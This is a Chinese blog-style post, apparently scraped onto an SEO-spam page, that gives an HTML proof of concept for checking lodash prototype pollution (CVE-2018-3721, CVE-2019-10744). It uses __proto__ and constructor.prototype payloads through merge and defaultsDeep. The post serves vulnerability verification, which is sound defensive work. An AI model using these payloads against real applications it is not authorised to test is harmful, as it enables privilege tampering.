当前位置：首页 > wzjs >正文

怀化高速网站百度关键词挖掘工具爱站网

wzjs 2025/7/22 10:48:21

怀化高速网站,百度关键词挖掘工具爱站网,北京全包圆装修公司电话,美食网页设计模板中文作为一名漏扫攻城狮，时不时会在AWVS中看到lodash这个漏洞，但是我只管导出报告，该怎么验证呢？ 验证POC 下面就是用于验证的POC，把这个html中的src进行修改为扫描的网站中的lodash.min.js然后浏览器打开 <!DOCTYPE …

作为一名漏扫攻城狮，时不时会在AWVS中看到lodash这个漏洞，但是我只管导出报告，该怎么验证呢？

验证POC

下面就是用于验证的POC，把这个html中的src进行修改为扫描的网站中的lodash.min.js然后浏览器打开

<!DOCTYPE html>
<html>
<head><title>Lodash 原型污染测试</title><!-- 加载 Lodash --><!-- 这里修改src中的链接 --><script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
</head>
<body><script>// 测试代码const payload = '{"constructor": {"prototype": {"lodash": true}}}';_.defaultsDeep({}, JSON.parse(payload));if ({}.lodash === true) {alert("⚠️ 漏洞存在！\n你的 Lodash 版本存在原型污染风险 (CVE-2018-3721, CVE-2019-10744)");} else {alert("✅ 安全！\n你的 Lodash 版本已修复注入漏洞");}</script><script>// 测试代码const maliciousPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');_.merge({}, maliciousPayload);// 检查是否污染成功if ({}.isAdmin === true) {alert("⚠️ 漏洞存在！\nObject.prototype 已被污染，isAdmin=true");} else {alert("✅ 安全！\n未检测到原型污染");}</script>
</body>
</html>